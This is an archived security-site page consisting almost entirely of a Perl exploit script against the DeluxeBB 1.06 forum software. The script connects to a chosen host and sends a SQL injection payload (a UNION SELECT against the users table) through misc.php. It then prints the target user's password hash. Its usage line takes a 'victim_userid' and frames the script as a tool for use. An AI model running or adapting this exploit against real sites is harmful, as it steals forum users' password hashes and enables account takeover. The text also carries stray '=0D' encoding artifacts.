TUCoPS :: Web BBS :: etc

TUCoPS :: Web BBS :: etc :: b06-2236.htm
DeluxeBB 1.06 Remote SQL Injection Exploit
DeluxeBB 1.06 Remote SQL Injection Exploit DeluxeBB 1.06 Remote SQL Injection Exploit

#!/usr/bin/perl=0D
=0D
use IO::Socket;=0D
=0D
=0D
print q{=0D
#############################################=0D
# DeluxeBB 1.06 Remote SQL Injection Exploit#=0D
# 	exploit discovered and coded        #=0D
#	   by KingOfSka                     #=0D
#	http://contropotere.netsons.org	 #=0D 
#############################################=0D
};=0D
=0D
if (!$ARGV[2]) {=0D
=0D
print q{ =0D
	Usage: perl dbbxpl.pl host /directory/ victim_userid =0D
  =0D
perl dbbxpl.pl www.somesite.com /forum/ 1=0D 
=0D
=0D
};=0D
=0D
exit();=0D
=0D
}=0D
=0D
=0D
$server = $ARGV[0];=0D
$dir    = $ARGV[1];=0D
$user   = $ARGV[2];=0D
$myuser = $ARGV[3];=0D
$mypass = $ARGV[4];=0D
$myid   = $ARGV[5];=0D
=0D
print "------------------------------------------------------------------------------------------------\r\n";=0D
print "[>] SERVER: $server\r\n";=0D
print "[>]    DIR: $dir\r\n";=0D
print "[>] USERID: $user\r\n";=0D
print "------------------------------------------------------------------------------------------------\r\n\r\n";=0D
=0D
$server =~ s/(http:\/\/)//eg;=0D
=0D
$path  = $dir;=0D
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;=0D
=0D
 =0D
print "[~] PREPARE TO CONNECT...\r\n";=0D
=0D
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";=0D
=0D
print "[+] CONNECTED\r\n";=0D
print "[~] SENDING QUERY...\r\n";=0D
print $socket "GET $path HTTP/1.1\r\n";=0D
print $socket "Host: $server\r\n";=0D
print $socket "Accept: */*\r\n";=0D
print $socket "Connection: close\r\n\r\n";=0D
print "[+] DONE!\r\n\r\n";=0D
=0D
=0D
=0D
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";=0D
while ($answer = <$socket>)=0D
{=0D
=0D
 if ($answer =~/(\w{32})/)=0D
{=0D
=0D
  if ($1 ne 0) {=0D
   print "Password Hash is: ".$1."\r\n";=0D
print "--------------------------------------------------------------------------------------\r\n";=0D
=0D
      }=0D
exit();=0D
}=0D
=0D
}=0D
print "------------------------------------------------------------------------------------------------\r\n";